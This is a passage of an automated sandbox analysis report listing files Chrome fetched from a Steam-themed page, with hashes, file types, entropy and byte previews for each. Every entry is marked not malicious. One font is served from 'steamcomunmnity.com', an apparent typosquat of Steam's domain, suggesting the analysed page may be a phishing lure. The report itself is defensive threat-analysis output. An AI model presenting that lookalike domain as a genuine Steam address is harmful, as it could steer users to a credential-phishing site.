        SHA-512:77F4E8B8D249EA490098866FD5A58337965AFC2222B3D8138F7B87EDB6298532BA58D90F8BD49D5629EF35B515D40E4BCCD6F1416F98CB27F06486E5F30883A8
        Malicious:false
        Reputation:low
        Preview:.PNG........IHDR.....................gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD..............caNv...............<'A......IDATx..i.m.u...t.c.o..U.*.P..0. A..@.....@5...6%Y.hG...h.......O...![V...Ar..H.......B.....g.?.s3.=<P......<..s..k.......g..F......x. _c..0?....#....d.f. ..g-D....(m....C"..!...QH..H@H.*C...h..hL.6......g..D@HP.(...=......O1../z.....p.&....!.1F... .A@z }6bL?.C.......k.........v.....{...=.Y.{.~.z.{_.....~...c.CD.....5..7...q.xx....@ p*..PA.(P.bwi# ...CD".".c......_.s.c$..1.>.x...}.....ky.u^....|.....]V.z.}.~_>x\.r..E~....?..?K..r......\R.%...E.A....|.....@....z.....;...8.....;.....L..m..,G...$.G...D.P.%..{B..!P..[.xg...C@..O@!."..1..s....QYF..v>AvF..B...5.ID ..5..5H.Aj.4...?\._...a1.M]V(.u.;...!.B:f...>....<...9....}..#..3..=..E|....t.;...>.m,..rw.c.r.!..&w.LHg.6.........B*....E."t.$.A..x..w..6.cF...O....g.......[].......A.~......=`.X............o..........WV...,..Cp4V.....'p:.$ .JC.q@..L.D...D...N.s..t.D...
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:PNG image data, 15 x 13, 8-bit/color RGBA, non-interlaced
        Category:dropped
        Size (bytes):291
        Entropy (8bit):6.7719789082293165
        Encrypted:false
        SSDEEP:6:6v/lhPU8WnDspP8GYUQiOTmUDJcyYWm5kvrCBVreLbp:6v/78OaGYfLDBYCrCneL1
        MD5:A2796187C58C7E948159E37D6990ECC2
        SHA1:4209CD85ADD507247F9CE5A87A8C9095B54EE417
        SHA-256:23341256DB7F44B1F3811880FA2BAE6B7748BBF6B62C544A162E38CF0D5C5082
        SHA-512:5EF103B8398507495C2708DF8FCD82BDB763B1D580AAAA6CACFB805614764277C19E8ECE5D890A8AAFC004FC8C25E3AB2E67D6FBF373C432A9A0D7C36FA0890F
        Malicious:false
        Reputation:low
        Preview:.PNG........IHDR.............v.4A....tEXtSoftware.Adobe ImageReadyq.e<....IDATx.b...?.......9....]@.......O.G..@...?..:!..H.....T...{.i>..Y.M...ff..W..'.._P>..!..j.......&......4.'...X.@......?.5..m7..E..X.....Eh. ...P...Q ........... ...%.......y...c..@..?i...{.....HteDtom....IEND.B`.
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 600x337, components 3
        Category:downloaded
        Size (bytes):103334
        Entropy (8bit):7.978305800765893
        Encrypted:false
        SSDEEP:3072:pAAFdHLSwwUIMyC8eFmRBXJaPPNWKY9xZIWjnJi:BHuKrypeFmRMNWKGZv1i
        MD5:50AE5A62013B151C18A4EB38A14F8649
        SHA1:A52BF97E86E5FF59EFCF5217D1AEB08687C31B6B
        SHA-256:E9A9DC516E6767401BE5AAEF682062DE2ECFDD6892A645391466470705236CE9
        SHA-512:7314F071DB430F4677604406702A89A2B875DE1E1CFE72A008EC30B22AC597CE76B33DE833AB76AF372CBFD7EA129AB97E0E50916B4C095F39386C2C9D1520F1
        Malicious:false
        Reputation:low
        URL:https://shared.akamai.steamstatic.com/store_item_assets/steam/apps/2479810/ss_0ff495af00d27e5afe128faeab0cf3370c5040ca.600x338.jpg
        Preview:......JFIF.............C....................................................................C.......................................................................Q.X............................................[.........................!.1..A.."Qa2q...#B....3Rr...$4b..5Cs....67Sc...%tu.T.&8Ddv......................................<......................!..1A."Qaq.2........#B..3R.b.$Cr.4S.............?../...c-....z.0.?.7.K:....#.>aT.UWH...;.......=.j...'.....V.}.`....o..p..4sj#.mi. ....Is......4g.#$.+......<.a..#X..;.p.......:......qTH.D.%..0#.....u.6'e.#......]...8x....+.;._J*..NzU......-v.1....,%.Ym..8?#.(...Va$M.(...G.u..K.??eb.T..:..?uS.......<.......J......k\...>?E>.w..u.u..!..k#.{0B..".-r......G..w.?x_..8O.).m..8........TT... o2h..p......P[M...$[.Zvo.p.'....V......3QQS............'#....@...R(n.*.GX`^.....+..-@.!q7..*<@.Y....\.......I2.....G.s.*....*.t.@NDJ.R~^..5.f..F.....;..<..0......~.....E$......./...Y...o....gn...O....y....b1Io.<...\.$
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:ASCII text, with very long lines (65482), with CRLF line terminators
        Category:downloaded
        Size (bytes):93637
        Entropy (8bit):5.292996107428883
        Encrypted:false
        SSDEEP:1536:96IzxETpavYSGaW4snuHEk/yosnSFngC/VEEG0vd0KO4emAp2LSEMBoviR+I1z5T:v+vIklosn/BLXjxzMhsSQ
        MD5:E1288116312E4728F98923C79B034B67
        SHA1:8B6BABFF47B8A9793F37036FD1B1A3AD41D38423
        SHA-256:BA6EDA7945AB8D7E57B34CC5A3DD292FA2E4C60A5CED79236ECF1A9E0F0C2D32
        SHA-512:BF28A9A446E50639A9592D7651F89511FC4E583E213F20A0DFF3A44E1A7D73CEEFDB6597DB121C7742BDE92410A27D83D92E2E86466858A19803E72A168E5656
        Malicious:false
        Reputation:low
        URL:https://store.cloudflare.steamstatic.com/public/shared/javascript/jquery-1.8.3.min.js?v=.TZ2NKhB-nliU&_cdn=cloudflare
        Preview:/*! jQuery v1.8.3 jquery.com | jquery.org/license */..(function(e,t){function _(e){var t=M[e]={};return v.each(e.split(y),function(e,n){t[n]=!0}),t}function H(e,n,r){if(r===t&&e.nodeType===1){var i="data-"+n.replace(P,"-$1").toLowerCase();r=e.getAttribute(i);if(typeof r=="string"){try{r=r==="true"?!0:r==="false"?!1:r==="null"?null:+r+""===r?+r:D.test(r)?v.parseJSON(r):r}catch(s){}v.data(e,n,r)}else r=t}return r}function B(e){var t;for(t in e){if(t==="data"&&v.isEmptyObject(e[t]))continue;if(t!=="toJSON")return!1}return!0}function et(){return!1}function tt(){return!0}function ut(e){return!e||!e.parentNode||e.parentNode.nodeType===11}function at(e,t){do e=e[t];while(e&&e.nodeType!==1);return e}function ft(e,t,n){t=t||0;if(v.isFunction(t))return v.grep(e,function(e,r){var i=!!t.call(e,r,e);return i===n});if(t.nodeType)return v.grep(e,function(e,r){return e===t===n});if(typeof t=="string"){var r=v.grep(e,function(e){return e.nodeType===1});if(it.test(t))return v.filter(t,r,!n);t=v.filter(t
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:GIF image data, version 89a, 600 x 337
        Category:dropped
        Size (bytes):717
        Entropy (8bit):7.53474088967301
        Encrypted:false
        SSDEEP:12:Gsa1HWFSEyPb4436AIpOJg8GTn3STvC4rvpydlr0cJ+VuJsz+GNdYBE:GsDAPcVAIQJNGMgJJYM0dYBE
        MD5:123FB3CE825CAC7A073DBFE0C9700CF8
        SHA1:95382BF6B587DE98339BC7D75777E3B70AA38290
        SHA-256:A34021A5F4D5E668E763AF8873360589E094392D6E0376B334777410BED88F3D
        SHA-512:ECC43519080870EBFE975865BB3011AEE15592A69144066322FDAEB2F562A007DBC36C5B1BCBD8DF63015C355CBE9B0CE4ABBCC0282FD6695E4A92C7657D894E
        Malicious:false
        Reputation:low
        Preview:GIF89aX.Q..........!.......,....X.Q....................H........L..............L*.....J.....j..........N....................(8HXhx..........)9IYiy..........*:JZjz..........+;K[k{..........,<L\l|..........-=M]m}...........>N^n~........../?O_o..........0......<.0....:|.1...+Z..1....;z..2..$K.<.2..,[.|.3..4k..3..<{...4..D..=.4..L.:}.5..T.Z..5..\.z..6..d.=.6..l.}.7..t...7..|....8......>.8....;~.9...+[..9...;{..:...K.>.:...[.~.;...k..;...{...<.....?.<....;..=....[..=....{..>.....?.>.......?.......?.........`...H`....`....`..>.a..NHa..^.a..n.a..~.b.".Hb.&..b.*..b....c.2.Hc.6.c.:..c.>..d.B.Id.F..d.J..d.N>.e.RNIe.V^.e.Zn.e.^~.f.b.If.f..f.j..f.n..g.r.Ig.v.g.z..g.~.)Q..;
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:ASCII text, with very long lines (65371), with CRLF, LF line terminators
        Category:downloaded
        Size (bytes):90114
        Entropy (8bit):5.325158762948251
        Encrypted:false
        SSDEEP:1536:qBJtu6wr048dCHASHY9ZmruYYmF0qwSds2lyUYt7LvXB60I7cxe3tHJq6J3HyPf2:r
        MD5:C2C2A59E97C2B2266B77D1E4F0886FB5
        SHA1:0281B497962D30430CE3DE8B13E2368DCCA76D64
        SHA-256:067DD8BECA6FCBEC0149C647B4144FE46CA526A6EEB8BB5D224D5D8E4F2D198C
        SHA-512:8748A6EF1465A1AC023570729EBF0DF51C625AB64BE4E3103199E15DC4C4CA4A3D7650578358E7C545F028B7FCD020E52B5138CE1ACF79C3FB7A0A985F1DF2AC
        Malicious:false
        Reputation:low
        URL:https://store.akamai.steamstatic.com/public/javascript/applications/store/460.js?contenthash=82571d7875dea9c593c3
        Preview:.........../**** (c) Valve Corporation. Use is governed by the terms of the Steam Subscriber Agreement http://store.steampowered.com/subscriber_agreement/. ..****/..(self.webpackChunkstore=self.webpackChunkstore||[]).push([[460],{59223:(e,r,t)=>{var i=t(99928),n=t(62679),a=function(e,r){var t=new i((r=r||{}).typeNumber||-1,r.errorCorrectLevel||n.H);return t.addData(e),t.make(),t};a.ErrorCorrectLevel=n,e.exports=a},72529:(e,r,t)=>{var i=t(83415);function n(e){this.mode=i.MODE_8BIT_BYTE,this.data=e}n.prototype={getLength:function(e){return this.data.length},write:function(e){for(var r=0;r<this.data.length;r++)e.put(this.data.charCodeAt(r),8)}},e.exports=n},6438:e=>{function r(){this.buffer=new Array,this.length=0}r.prototype={get:function(e){var r=Math.floor(e/8);return 1==(this.buffer[r]>>>7-e%8&1)},put:function(e,r){for(var t=0;t<r;t++)this.putBit(1==(e>>>r-t-1&1))},getLengthInBits:function(){return this.length},putBit:function(e){var r=Math.floor(this.length/8);this.buffer.length<=r&&
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 184x69, components 3
        Category:downloaded
        Size (bytes):6981
        Entropy (8bit):7.933061170224312
        Encrypted:false
        SSDEEP:192:Dt8oIaxdb5adX9CZmVdJpcIqTMLVbETcDd:Dt8GdYdYw/LVggd
        MD5:DC6332D1EA8F9E84778262F6525E2398
        SHA1:C0BE541B027EDA558351FAB9A70B2160F2494D59
        SHA-256:4B161A4B07418F259A8ECB46C19BA28CA28CBB39EBD328AFB98A3F28A385CA3C
        SHA-512:66AEFA32B85226068BCE2F9509C51E9F1DB2702A12836541ACE3B50F4579CB1790781C5FEF432CA5CE170D4F375322CFFC347A4757B89CD4F755ED39F4C3297F
        Malicious:false
        Reputation:low
        URL:https://shared.akamai.steamstatic.com/store_item_assets/steam/apps/2183900/capsule_184x69.jpg?t=1716544397
        Preview:......JFIF.............C....................................................................C.......................................................................E..............................................9............................!1.A."Qa...2q#BR..$3b.%Cr..................................9......................!..1AQaq......."2....BRbr....#$3.............?....[.]....iw.n.... }..\V1.]....).........T.%d.6I'.r;a...c...1..$sH.MDc#W..)..Q.bS.5.G!.u.F....Q....(Q......}Q.......t...R.S.$+.L.,..b.. ...3....26..s...._...!.@mG?*....tE.CJx.JH..$v... ..\...4.D....{i....,!H.;j.*..$...E8..,.[\3.02..E..3uJ....A.U.SYL%Ei(*e`....?..q.N.bK.z..D.....S\AF.e....F...L..MP..Q.'......$..tF...j(4F..Q.kdgA....w\?....D.Rc.Ly.2..L....9.%.!(q..)_,..u.{W.{.n../......H..m...f...V#!.}W..yQ......v.jRg..[.K~.P.S...s.{..`..7.....r..q....5v.....ftToS;.j..BE.`[.]a%L.a.N....J.`.J.1.!9.......8.Ha]E..Zf6..N...t_..#.?..4..X.r.....si.....&.....~\5...p.q...iX)...d..^...v.aE(`.&.
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:PNG image data, 2000 x 800, 8-bit/color RGB, non-interlaced
        Category:downloaded
        Size (bytes):161187
        Entropy (8bit):7.990584731304817
        Encrypted:true
        SSDEEP:3072:bZ9L5Lw6SelSTdibeeotIIwQTHchAMXBDjLjtFzVEJJU:bZ99w6SelSsDomIMxD3jFEfU
        MD5:1D7363064D454B57F9C84DF28F566CE7
        SHA1:773B8A0F0C6CBDA10B0C2BA62FB53D323946E311
        SHA-256:F2F4D59A808653E110B074AB0DC600B249E7451CC609EEEFF3EFDA1E32CCF7D8
        SHA-512:F8A9E4C39D6C3E12AD9D01DB9C0318FCB82B5DBE97B57CA6576A482CE157F456786752825E397122EA45FBCE77E6C3CF62A2671C1973E40DCBF3CF26852CD49C
        Malicious:false
        Reputation:low
        URL:https://store.akamai.steamstatic.com/public/images/v6/colored_body_top.png?v=2
        Preview:.PNG........IHDR....... ......n$....tEXtSoftware.Adobe ImageReadyq.e<...fiTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:4F55FCD074F3E4119506ED59260C4062" xmpMM:DocumentID="xmp.did:17B3CA22F37811E492C4CBECAFB1AE21" xmpMM:InstanceID="xmp.iid:17B3CA21F37811E492C4CBECAFB1AE21" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:F44166A275F3E411A027CF77346B534E" stRef:documentID="xmp.did:4F55FCD074F3E4119506ED59260C4062"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>B....q.IDATx......(O...........W.I$@.$.(2..^...
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 292x136, components 3
        Category:dropped
        Size (bytes):28500
        Entropy (8bit):7.968803646393694
        Encrypted:false
        SSDEEP:768:1I/0BgLobGfrIpNozbJnrCoJYIc8ziKZRinXosQS6k:1I/0zTMzbJnrCvhKwNQvk
        MD5:D69D146E424ED831D7EE45FBC7AB42C0
        SHA1:463175D25CBD437621EACE08576F88A5EC6B3AE0
        SHA-256:C06137FEB1714BD03D848804D3AFE1572792A761BB92005B3BBCECB2D7314B11
        SHA-512:A335041C75775D9BBEC3142F32A3B86B66E770FE4412F1187D38746477CC6CED9A29F93F77599DF0B67A6EB9A6AF992AAD1E43EB4D730913D76705F335BC42AA
        Malicious:false
        Reputation:low
        Preview:......JFIF.............C....................................................................C.........................................................................$............................................E...........................!1.A."Qa.2q.....#BRbr...$3....4CScs.......................................<.......................!.1.AQa.q.."......2.B...#R$3b.r..C.............?..2H...)...F....M&IUQ..z.5.0(?rm...........`.g.v.-..J..K....j).I#!.....]j...".)%&...N..h.P.....Bk...k.j.8.....U...Q...#Q...w..}..j@Wx.YI.@.*....(>U.5eHQ[d...8.3.R...ur.T&*e....Ldg.hd....<"7.{...UT.rn.:....Z.{..Ul....e.....\..O.Rj.,.h...7.....T"h`..-...W'.4*..Jk..i...iMUH.MJ9..}..:...u8BGS..LXB..........^.[m.l+RxS.[...T.......@...Iw....i.W..?......^V.....#m|>n;.j..1...))Z.....1...Qv...7...+..z........S.4sa.;gc..J8.y0'...j...#w..F.{.E$...x...4.......=..(TT.(~[x...s.....1.&......:..4..E...Jr....x...+9...[G:.6.H(......n.u_.....H.`B...[......m...Y..Q.."?.J...0.D..q.p..Td..v.:...I....&j
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:Web Open Font Format (Version 2), TrueType, length 29104, version 0.0
        Category:downloaded
        Size (bytes):29104
        Entropy (8bit):7.993786755731096
        Encrypted:true
        SSDEEP:768:9JxwZJhcx+M+6lxBZB3TRmltuaLuNo9aOjTC:uVcEM+Ayuaco9aOHC
        MD5:38A35C7070979FB4C845DE40CADA43C5
        SHA1:B0F804F348B746449E6589B92DFF685509737DAD
        SHA-256:FCFF4301DC083AF2BE2B990BB6485E9E06CE9D2B373A7ACF8A74F61EA69D861A
        SHA-512:E7E5B167FA9187EA785BE311F43E15F33D51C20E9D07E1E15E3A761A7B6A857B2AD270E3F0E6CB0D85327BC0AA3454646A2B5E040B30EDEDE216E57CC113F089
        Malicious:false
        Reputation:low
        URL:https://steamcomunmnity.com/assets/9qca2sf5gp/fcff4301b0g5sjdy1se.woff2
        Preview:wOF2......q........x..qT.........................`..`....*..Y.....l..e.6.$.."..... ..s. ..S........@.<D.....I.....CB..j..~..?...?..G..9o.@...A.D~.>...i.-_.....N..q$.$.'Z...V...S./Q.\.PUx...<...i.7_../.y.1A...K\.M....=^......K.....5s......B...W.HQ]S..{...U...4..8....p.....tw;.v"...~.u..M.IL...s.&. ........y^7.d.A...+..a. ;.l..$$@.......p@....Q..;..X..u....;p...mm.....m.>.......q.....X..F......T.....pU..........z..U.j..DJr.a.2.w:..K..G.?.`.8..kw.C.U..Me..M5[B.t.R.S.........c..? i.......<`8..]..!..ARaS..T....J...uHaS..r..w..>.\..]..........3.B..\t..w...........!DP!C..J.#.|.p ..8..(....C.UV..m.j....J.]...ZLw~."A@...4...&.m..}#e...:..h8.."..N ...6$.%v...n..E.X.F.D....../.g..Zoo.........6*...X.#S...y5.(^.D..E..j....E.Y:t..7.0.5b,0a..3.p.#.p...8......7...;<..'...^r..\.|.|..~..... .@...`..B.B.E.a.'..D .HD..h..C.b.....C<.H ..$".$$...R.J*.HC:.. ..d.,;<.l..C.r..G. .|.P.B.QD..)F.%(..e...rTP.J*QE...F.5...u..z4.F..D..iF.-h..m...vt.N:.E...F.=..}...~X.b...2.!.0.0F
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:PNG image data, 501 x 201, 8-bit/color RGBA, non-interlaced
        Category:downloaded
        Size (bytes):173945
        Entropy (8bit):7.993579285920834
        Encrypted:true
        SSDEEP:3072:LILVJszNCDvFSDZqmjJ2Cj01ft+mdIpd+52IDQOL:kgQDs4msCAFt+mdE+/QC
        MD5:1470A096AA38768AA1781ECF23887EFF
        SHA1:2C26EA931550E6DF35C6273B4F6C618B42B0A927
        SHA-256:6A0B7B41143DB496D89FB712DACCAE0395965BCD1687531A3402C0F9D721014E
        SHA-512:C7413471550EF285E585C9DBFE47B43247EC9EE41F5B3E96F9F6F36502E383F649F33756EE83844B7D9A9EF17F681A2FDA0FF5162369A286C15C2109A3D71925
        Malicious:false
        Reputation:low
        URL:https://cdn.akamai.steamstatic.com/store/steamdeck/steamdeck_promo_03.png?v=2%20alt=
        Preview:.PNG........IHDR.............:..s....pHYs.................iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c001 79.1462899, 2023/06/25-20:01:55 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:tiff="http://ns.adobe.com/tiff/1.0/" xmlns:exif="http://ns.adobe.com/exif/1.0/" xmp:CreatorTool="Adobe Photoshop 23.0 (Windows)" xmp:CreateDate="2023-11-14T10:08:43-08:00" xmp:ModifyDate="2024-02-09T14:19:44-08:00" xmp:MetadataDate="2024-02-09T14:19:44-08:00" dc:format="image/png" photoshop:ColorMode="3" xmpMM:InstanceID="xmp.iid:6c7043dc-
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 600x337, components 3
        Category:downloaded
        Size (bytes):42048
        Entropy (8bit):7.963851931335445
        Encrypted:false
        SSDEEP:768:5mNZ2DaZz1ecbjaH/rsMG2DuLQldStxF1wR3IkldFhDBrVhBTTmdnrq+:YWaZx7bjuIX2Stf1wpIg3r/WVX
        MD5:A4A1E59187C9C4597B2A4728A747F46D
        SHA1:2C8DB5FF6E7B9193C251558BA2BC07326958E0E5
        SHA-256:49E22586A4755E9AE707CFD1CA92A7B83611DB6BEB91AE28E6D85F501003E1FA
        SHA-512:EC8706A21854092D7B045E40E664070B8F25EF41BD66F0D3E5FBB231DD5456372A9DBE17774D6114E8BA1BE873C3F788EA7A92C62A8B1A5801FCD5A7137AFB7B
        Malicious:false
        Reputation:low
        URL:https://shared.akamai.steamstatic.com/store_item_assets/steam/apps/2215430/ss_51eb1a47a41271abb0aa781de576f704d95b601b.600x338.jpg
        Preview:......JFIF.............C....................................................................C.......................................................................Q.X............................................L.........................!1A..Qa."q.2..#B.....Rr...$3Cb..%4c..s..DEST..5..................................5......................!.1A.."Qa2q.....#B..R...Cb..3............?..._R.>pBh...R)1(,(...=.....S.....@..C@..OHc. ..J...J.*.(...QY..H.....d.H....(.:PX.@.....P.@....P.@.....h.BPPP.@....P.@....P.@....P.@....P.@....P.@....P.@....P.......1..4........z.@%4.L....(...=..h.Vlb....p)..Z.S...t5....@.`...K`M=..l....Y...6.......P4.....q.z.(......(......i..%...(......(......(......@..a@....P.@....P.@....t.A@...(.W...9....Vr.bq...(..(.P...h..@..(......(....k1....#c.j...T.L......T.)...9....+...v.X....vL..u....(L....m..".....rh.........7..".RM....T;...M..88=(.A....J.(.......(..SB. ...@.LP4%...(......(......(......(......(......(.......!B..b.....b.Z.=:.C-.EY.T...4.S.>.M<iq..
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:PNG image data, 20 x 20, 8-bit/color RGBA, non-interlaced
        Category:dropped
        Size (bytes):2849
        Entropy (8bit):7.864889439878249
        Encrypted:false
        SSDEEP:48:V/6DocieftI9G9f6A+FIDOWu0lDl+gm7QyTtctIInQSy6IVpqlnBcODR:VSDZ/I09Da01l+gmkyTt6Hk8nTR
        MD5:DC8F5B05CEA9BCD58BF22F88D54C9B42
        SHA1:A1C91EAF895E066D1A1EDD60E039FF8A44A31FB6
        SHA-256:5B30184DFE00661434D5420500133935A0188E2BB2AB079DDCFF496166C98107
        SHA-512:977032565A56B13AA576AF7EFA8D53099AE5383D59619B5D31C09392C896E98D1CF15B1627BD83EB849957C4D55518B8A7BBF3D2FF14EDF177874FEB84E20824
        Malicious:false
        Reputation:low
        Preview:.PNG........IHDR.....................pHYs................OiCCPPhotoshop ICC profile..x.SgTS..=...BK...KoR.. RB....&*!..J.!...Q..EE..........Q,......!.........{.k.......>........H3Q5...B..........@..$p....d!s.#...~<<+".....x.....M..0.....B.\.....t.8K....@z.B..@F....&S....`.cb..P-.`'........{..[.!..... .e.D.h;...V.E.X0..fK.9..-.0IWfH.............0Q..)..{.`.##x.....F.W<.+...*..x..<.$9E.[.-q.WW..(.I.+.6a.a.@..y..2.4..............x.....6..._-..."bb....p@...t~..,/...;..m..%..h^..u..f..@.....W.p.~<<E.........J.B[a.W}.g._.W.l.~<.....$.2].G......L.....b..G.......".Ib.X*..Q.q.D...2.".B.).%..d..,..>.5..j>.{.-.]c..K'.Xt......o..(...h...w..?.G.%..fI.q..^D$.T.?....D..*.A....,.........`6.B$..B.B.d..r`)..B(...*`/.@.4.Qh..p...U..=p..a...(....A...a!..b.X#......!.H...$ ..Q"K.5H1R.T UH..=r.9.\F..;..2....G1...Q=...C..7..F...dt1......r..=.6...h..>C.0....3.l0...B.8,..c."......V.....c.w...E..6.wB a.AHXLXN.H. .$4...7...Q.'"..K.&.....b21.XH,#..../.{.C.7$..C2'...I..T...F.nR#.,..4H.#...dk..9.,
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:GIF image data, version 89a, 1500 x 220
        Category:dropped
        Size (bytes):2748263
        Entropy (8bit):7.930938237591837
        Encrypted:false
        SSDEEP:49152:t5aIe62ofDq1LTvIm6AQyTcTFKxG433a8pJWQ1Wg2Adod0uQ7WOe:twu2LLYAQ2nxG4nakIgJqC7xe
        MD5:8F02A506549F2DAA5D0F6531EBDFB9CF
        SHA1:6BB1DD7627E4BBF4286BDF04331A3602D6772B82
        SHA-256:91CC05C83F0A59380B894BB9212B4A279AC797860286186978D8113B53C7DEAE
        SHA-512:53257BFE42C77812466B792E2B4FC4D341B6959308B00A022DDDA458F9C6959F7C75E09E7AEFB16FEE177ED43C7033571A549C348FE6E3A4E494258E73D9C1EC
        Malicious:false
        Reputation:low
        Preview:GIF89a............$lG8mUB.lM7JB..visd.y4.......rR..%.......u.xhEB6...TWH.....!"(#.M3.y'(B9...592TZRgkc 1).zE..v..2..C.. .)"..g.g4EI?VF6F62%".h6.51(..y.u6.Wz.s.z&.zd...U62.xgJZR.e.'.TE5'..'vkY.WC.wG....W..zT..y..W9RE.z.!..k.I..{.v'......g7WGB..rV2(. ..w{t|aF.j33) ukc..Zkc..i....w.K..ivsY.D.i..j....u...8.!..u4JcT.{Bua4..O._.u...z...4.4........]R:.g%WC(..o.x&.{SF)(..{ivr.S.e]G....<.k3....{s..dhsZGB(.kD.]B.y1VcJ.k'.q..=*U)'.j_.hA......>.D...)GB.{s....?.H..{_.{..Z*..f..+.V.?..{n,..k[.w HR8..1MF.F)1.uG.q8)*.~.T\S'.\.rg.)))fW.V)159BSZcJJJl{}...ckl...1B:)91.....h.kBG..!919B)BRJRcR..o!11JZJZcRckZZcZ.k)BRBJRJkmC9B:ZkZsscRcZ)99*. q{kkkZ0J9{{kccZ9J9..Lc..{sccbR.kB99*1-JRB9B1!99BZLUJJssk1B1lcZp{c{sk|{anaRRk[ckRmkPZkRZsbKZ@/19JcJ.kLRkR.k19JJ?RW..gBJ1...!..NETSCAPE2.0.....!..XMP DataXMP<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 6.0-c006 79.dabacbb, 2021/04/14-00:39:44 "> <rdf:RDF xmlns:rdf="h
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 115x65, components 3
        Category:downloaded
        Size (bytes):2935
        Entropy (8bit):7.832603809472771
        Encrypted:false
        SSDEEP:48:vd/OcEc+qxEBZun2A4NKNVbp+ksSYzC0NOmA8rALS1v09d5E5xSGnAa0:vdnxE0lsKNVVp5mA8rXM9d5EKaAl
        MD5:A2E90EF2BBD1BC69A998AB0EE66D3C15
        SHA1:7EAADA3D4B738505FC0737AA4DA9C042DB6D441E
        SHA-256:A34A4F415CA6D2D6D0273C8C1B482013595F48D43C911BB450AC7CD3A5C34D5C
        SHA-512:1176A554B6A7578CE60DD4038DA90EEAEA0A4F7DACAB27DD978E667A4A515F09330691B3A0331B82A5672498C27ACF540E6A655E2A3B2C33AA6F1D32F9109ED3
        Malicious:false
        Reputation:low
        URL:https://cdn.cloudflare.steamstatic.com/steam/apps/1643320/ss_bca8d304b761a9fadc17bd53fe911dab7c71e9b7.116x65.jpg?t=1705420866
        Preview:......JFIF.....H.H.....C....................................................................C.......................................................................A.s............................................9.........................!1A..Qq"2a......#B....34.Cr...................................,.......................!1.AQ.".2aq.#................?......9..b.,.../R.....$0..{}..FyA.....#...........E..s.e..9....i[..ZE*..<. .QI.4.....FZ5.#..O.H..T.V4.0.......T.;..[..rIqs+.Cg.=1..p.=.su+E..]..m4.2....3......=........b9<....k.M... .8..Y.F...6..,.8....TQj..n.R1,..-;.I.....uD..7a...C.W..ix.H....U.....0T...#..RDpa._4...q.du....w....... )=I4.b.:..`..P..=..m....Z|..t....'....K..#.h.Hw<...~..M.".......Q.....C.ut^.E....i...v....M..nf.+...E..eT?RZ...fu8......q...%.........r....*..N.KG;B..}.m..$r.0./.:...Q.....V.u......J\y4IR,.1i....r{./sa.jC......;.z.I4.&........h.d....w..(V.Y..'...5`+.6....8$zU..[.mU.x.......j..qui...Nh[.&Zi.{.D...FX.m$S"..4.E....*'..`..8.z
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:ASCII text, with very long lines (21667), with CRLF, LF line terminators
        Category:downloaded
        Size (bytes):21832
        Entropy (8bit):5.356064745493551
        Encrypted:false
        SSDEEP:384:+hJkU4S/iqG/aPaRew1ilkR9bwUahxmliI8QaMBM7kUtKTw:CJdpZlSmOMhxqRfamMIe
        MD5:7994F0F7B1A39E5430A7453CC707B477
        SHA1:32F8C6354343CB6286E8464772ADADA0900F00F6
        SHA-256:2C400235D4870CEC4D647E9F372108B3A3F09D1716C7A38F287DE9CE8342DE2C
        SHA-512:0BE9D620093BC208E73F052E0870F5FA04653DAC0FF3B5626771B101413E2A3F5CEA14B15D9A3FE130FB3F33FCBF8BFB3FBFD9E3079D273758934FEA79903114
        Malicious:false
        Reputation:low
        URL:https://store.akamai.steamstatic.com/public/javascript/applications/store/7247.js?contenthash=4ed17150d6dd88abb853
